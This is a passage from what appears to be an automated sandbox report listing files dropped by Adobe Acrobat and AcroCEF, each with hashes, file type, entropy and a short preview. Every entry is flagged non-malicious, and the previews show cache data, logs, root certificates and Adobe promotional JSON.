                                                                                          SHA-256:A297D5B9FBF801C291113F5F4DC61FEB89EE7930C8F0AF9ED79FB6C1C81AF45D
                                                                                          SHA-512:DE6C2D2DBAFC5D78180692DA0E106A963D0A5AFE6A6EB524C04D39FE9DE724D0043F7A5144CFE8225B03E8C369B17176B7B178DD05D026F1A0E5A01CB2B89BE2
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377276884537085","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":790349},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4099
                                                                                          Entropy (8bit):5.23030727035916
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:OLSw0bSwIAnrRqLX2rSq1OUxu/0OZ0xRBTxekN8xe3QJC8:OLT0bTIeYa51Ogu/0OZARBT8kN883QJ/
                                                                                          MD5:107D0EC27AADDD04B95FE49695F7CE47
                                                                                          SHA1:85E57FF7BAA4AE7E6D9879E0877D9BD52030E678
                                                                                          SHA-256:D67A9EF08392CD2674ED86077E1DE2D2FADD5FC6C4E6947CF650730FBF1E865A
                                                                                          SHA-512:C75A766A32695C233346FC8E1BE2141F2702C9C81E32855A657EE4E0EDA39FC900BC39992CE7AD45196667428E75333B4DB14326C1AA8E523AD94046E4A929FF
                                                                                          Malicious:false
                                                                                          Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):322
                                                                                          Entropy (8bit):5.212384659334393
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:HCvTZuf+q2PRN2nKuAl9OmbzNMxIFUt8YCvTfoZZmw+YCvTdoNVkwORN2nKuAl9c:YZJvaHAa8jFUt85QZ/+5doz5JHAa84J
                                                                                          MD5:F6548818A5496DB5DCFFB3E6CA0D8976
                                                                                          SHA1:B4E579958B4E40F2F3DD1C1BB1597578B3DD4A1F
                                                                                          SHA-256:8E1344EBB52A7D8BD63103D40888C9610DA3640AB24A758C4C6FC75CC4E9B4FB
                                                                                          SHA-512:F191CB259749131BE9869D5D75007C3F418D4C395B9809539DB25F7FF24CE643DF6E8863129378E530EA7754943FCE1CFD183BA60E47440B83B456FC9F119186
                                                                                          Malicious:false
                                                                                          Preview:2024/11/27-09:14:36.462 1a18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/27-09:14:36.464 1a18 Recovering log #3.2024/11/27-09:14:36.466 1a18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):322
                                                                                          Entropy (8bit):5.212384659334393
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:HCvTZuf+q2PRN2nKuAl9OmbzNMxIFUt8YCvTfoZZmw+YCvTdoNVkwORN2nKuAl9c:YZJvaHAa8jFUt85QZ/+5doz5JHAa84J
                                                                                          MD5:F6548818A5496DB5DCFFB3E6CA0D8976
                                                                                          SHA1:B4E579958B4E40F2F3DD1C1BB1597578B3DD4A1F
                                                                                          SHA-256:8E1344EBB52A7D8BD63103D40888C9610DA3640AB24A758C4C6FC75CC4E9B4FB
                                                                                          SHA-512:F191CB259749131BE9869D5D75007C3F418D4C395B9809539DB25F7FF24CE643DF6E8863129378E530EA7754943FCE1CFD183BA60E47440B83B456FC9F119186
                                                                                          Malicious:false
                                                                                          Preview:2024/11/27-09:14:36.462 1a18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/27-09:14:36.464 1a18 Recovering log #3.2024/11/27-09:14:36.466 1a18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                          Category:dropped
                                                                                          Size (bytes):65110
                                                                                          Entropy (8bit):2.3008461290129545
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:azz8Q8Q8w8i8q8m8y8W8W8y89n88K8f8S8Oc8H8V80U8078VF8W8W8wE8z8H8N8d:whl0FBJEPiHd
                                                                                          MD5:2844D6670AAD678FBADC8B35A057CE34
                                                                                          SHA1:E6B155566E779D39C51381A8C16B3C9A6CFD8B44
                                                                                          SHA-256:B18AAB89720B1C87C2536A729CDA2244EB81E2FDBB76164E863E41F48B230068
                                                                                          SHA-512:E7B457699605397CC694E619223722769F9623B309A1FB8D40ADE63A9800E606F17A5615728A18EA91C7D47F20B167A87345AED6E00FEC361B377E8EF7ED1361
                                                                                          Malicious:false
                                                                                          Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):57344
                                                                                          Entropy (8bit):3.291927920232006
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:vedRBvVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:veBci5H5FY+EUUUTTcHqFzqFP
                                                                                          MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                                                          SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                                                          SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                                                          SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:SQLite Rollback Journal
                                                                                          Category:dropped
                                                                                          Size (bytes):16928
                                                                                          Entropy (8bit):1.215347676268521
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:7+tY+OqLi+zkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mzm+G:7MYbqLmFTIF3XmHjBoGGR+jMz+LhF
                                                                                          MD5:5E72A444699E52C61960092B8C47F289
                                                                                          SHA1:F770984650E0EC761D05C50337E5345F2FBC2E55
                                                                                          SHA-256:9B7BF12082BC312473FD65AD8AFD9809649F4204FDC0ECDF4359E4A7F1E8CAE4
                                                                                          SHA-512:5839986262F6B53C46A6A51C873175E2A03362A9995F23352B1F945EBEA156BBD751099CBD93D91F564B29D3C121FB56F6012E5C9CACD8342580731BB19E49E4
                                                                                          Malicious:false
                                                                                          Preview:.... .c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:Certificate, Version=3
                                                                                          Category:dropped
                                                                                          Size (bytes):1391
                                                                                          Entropy (8bit):7.705940075877404
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                          Malicious:false
                                                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                          Category:dropped
                                                                                          Size (bytes):71954
                                                                                          Entropy (8bit):7.996617769952133
                                                                                          Encrypted:true
                                                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                          Malicious:false
                                                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):192
                                                                                          Entropy (8bit):2.7686775296558497
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:kkFklal9JL/tfllXlE/HT8k1Ch1NNX8RolJuRdxLlGB9lQRYwpDdt:kKDl9JL/eT88o7NMa8RdWBwRd
                                                                                          MD5:B016E38F417AA187114D09AD52B85BAE
                                                                                          SHA1:99A7FA913931CBDCBEE499AA5E96F97B408EA011
                                                                                          SHA-256:5B3840E6E1D6898CB17C3BF24C1B240A8A7765CB38D83111A9C51BA164D16308
                                                                                          SHA-512:C5E4A72C77AE082F57674A654677FB5C59B571DB93098AB5694ED43DA615B4F0AC12313DAACAE45773EC0F333345F7F6D1618C50004A52246CDD284F9E32ADAD
                                                                                          Malicious:false
                                                                                          Preview:p...... ........)@..@..(....................................................... ..........W.....(..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):328
                                                                                          Entropy (8bit):3.2299096522237485
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:kKv5sL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:n5dDImsLNkPlE99SNxAhUe/3
                                                                                          MD5:665C38C59F1A46100DF0351401C9A241
                                                                                          SHA1:26AD7DCD06583C7B363ECF9D14DA2194B2EEB536
                                                                                          SHA-256:2495132DC334DF4E30E81AEBEFF74C5A7C99B1E4A2A2DEC187987A63649F83AC
                                                                                          SHA-512:0B54BDD7D0F68FE0E20B038F0574EDF103C5A4B7A5415CBD49AD94401B4CD69BF35B238E689FEE3F28549F23625DD0B3B8D1DC2916468AA075E7183613339FD9
                                                                                          Malicious:false
                                                                                          Preview:p...... .........e...@..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):295
                                                                                          Entropy (8bit):5.372475251557408
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXURc3sdGv7/Q5IRR4UhUR0YGoAvJM3g98kUwPeUkwRe9:YvXKXURL8jQWRuUhU5GMbLUkee9
                                                                                          MD5:5B9AE72A5D8449E5626922F3F30D9F66
                                                                                          SHA1:E94BB66B03314519E1F4E483818EF58978B16867
                                                                                          SHA-256:81780C321794F1DAE8B736465EBE6046B57C2541177E1F903CE9E204CF8B408A
                                                                                          SHA-512:ACAE14BA6CC58EA5CAEB55F1A424A648FE392AE781E892F7215AE22C5CC2109CEE797731B14F9D3477F580F807957D79CFA93A398B4D37E685C9AE8C36C9167E
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):294
                                                                                          Entropy (8bit):5.31940071289113
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXURc3sdGv7/Q5IRR4UhUR0YGoAvJfBoTfXpnrPeUkwRe9:YvXKXURL8jQWRuUhU5GWTfXcUkee9
                                                                                          MD5:9118D93BBC4FE9E164143A5A4897E0E9
                                                                                          SHA1:4507044E5BD8F2C7C6A0584DD07D61A005FAA629
                                                                                          SHA-256:0C2D00D9D7983E463456E7C47334DBDFECE25D880914DAEDD27FA090BA06A13E
                                                                                          SHA-512:B742405DCA7F18FA28241FD989F5DD8E189F4901DA3820A96588FEB9E13FA90718B29157D2CD4532BFB2548FC47B8DEE6D6ED6B02E8C574FBCE546903F97436C
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):294
                                                                                          Entropy (8bit):5.296943911109752
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXURc3sdGv7/Q5IRR4UhUR0YGoAvJfBD2G6UpnrPeUkwRe9:YvXKXURL8jQWRuUhU5GR22cUkee9
                                                                                          MD5:F36A11D67EAB37F95A22A6B0EDB94749
                                                                                          SHA1:006484BB84FAEC401B86746E9043A33F307EBD1C
                                                                                          SHA-256:C5F66D4ED6CE37E225E41D67F55D2299C97C2E12622207D28AF9627058DF23AA
                                                                                          SHA-512:F6376711079E3FA38E4266F06A03AF7F684ECC43DA60EFF2178B713223BEA83F6B4B5D37F27739421C110B1BF77085C481C4E3208B362606AE2E1B57381A83A1
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):285
                                                                                          Entropy (8bit):5.361175154868237
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXURc3sdGv7/Q5IRR4UhUR0YGoAvJfPmwrPeUkwRe9:YvXKXURL8jQWRuUhU5GH56Ukee9
                                                                                          MD5:E439A1BB54ED5E7BCFFFAF8322256346
                                                                                          SHA1:573227881C1EB22784D4702DF8F2D383E15B2678
                                                                                          SHA-256:0675E236E62C641F561D7F410F2B1B75800BC2522093E06DF122D3AB5F1F0B50
                                                                                          SHA-512:691701989A16FBE17729A7E136A4A27529EDB48511DA7CEA52F106EAC5868A7A37D7476F51E3747A5DAAB74EB953FD29F216F38C41ECF58D0BE97788CD55D2F3
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):1123
                                                                                          Entropy (8bit):5.6903509008472595
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:Yv6XURYtUepLgE9cQx8LennAvzBvkn0RCmK8czOCCSk:YvRRoUehgy6SAFv5Ah8cv/k
                                                                                          MD5:47254E83B75031530DFE2A02BCB2BDF4
                                                                                          SHA1:9D9F9FFAE32FBF16801DCD350CDAAAA7CC9E41DB
                                                                                          SHA-256:67A6F8F742482CCD3831F1CC8D2F6D7E170B46FF02D94F144A7390E770889070
                                                                                          SHA-512:CD64D281A9FAE81CF02CBB5392DB98143BEFA9204393FC5922E03C3A2873596956AA4FB1F6C0DAB55A5193CB4ABD0315E17A327876DBD5F165083EBDD94C3065
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):1122
                                                                                          Entropy (8bit):5.682837835380458
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:Yv6XURYtUIVLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdBt:YvRRoUIFgSNycJUAh8cvYHe
                                                                                          MD5:2B14F8F0F14F3DBC2F7A541006609D79
                                                                                          SHA1:580F313C2921302951C316FC343E10774BC64D61
                                                                                          SHA-256:F25BF385C90F46BA7CC32C72F3E2E3602A3000FDA13107FFE700798226DE0D01
                                                                                          SHA-512:504CADA6D6B374014C15258B2E6E11FD3B8208D391C37C247F6D36C01B738E8AEDF32A20135149417B258426CB6FBAFE18A5055694E96C9809E841B24D3BC77D
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):292
                                                                                          Entropy (8bit):5.311214563132603
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXURc3sdGv7/Q5IRR4UhUR0YGoAvJfQ1rPeUkwRe9:YvXKXURL8jQWRuUhU5GY16Ukee9
                                                                                          MD5:BFF84D07A08BCCF470DD8C6B4A314F3C
                                                                                          SHA1:21A0285164177490C63E48ADEC7BB1D1E69FFB5C
                                                                                          SHA-256:5ACD6DBD409CB025B59066CEB0913B60F38A6A7538BDB307C39F2F3728C65F1B
                                                                                          SHA-512:80DA94F9CE65113570ACE6BC5DFA1D8833FEB4A81C330D742871E318A9B8A1FC364F3FEB9D5CB30C92DA41B9C93DEDA40A273E2409B138CDAB0577457E18DD19
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):1102
                                                                                          Entropy (8bit):5.674631123866357
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:Yv6XURYtUN2LgErcXWl7y0nAvzIBcSJCBViVt:YvRRoUNogH47yfkB5kVk
                                                                                          MD5:907CB2A74985DCA778863FC7EA39644E
                                                                                          SHA1:B1EF468A8878493245CE809045C56CE2C2FDE225
                                                                                          SHA-256:30BAD10900D526ED33BF359E5FD4195044FD2B5E08B42E2458BEEB740DED49FF
                                                                                          SHA-512:1767CB9A27940F7927AD17710E54B7DA4960A66E52BE619A64322DFA545D45AED5D77A22ED166D30F34F93C967E3D2A94B4EAFFFED25D079C724E1BF7CBE6E19
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):1164
                                                                                          Entropy (8bit):5.701034032818051
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:Yv6XURYtUlKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK58:YvRRoUlEgqprtrS5OZjSlwTmAfSKO
                                                                                          MD5:5F9DE2CF775F53FDBC067C21552BFCEE
                                                                                          SHA1:CA9964601075B0408F75A551B230CA1F71E092E9
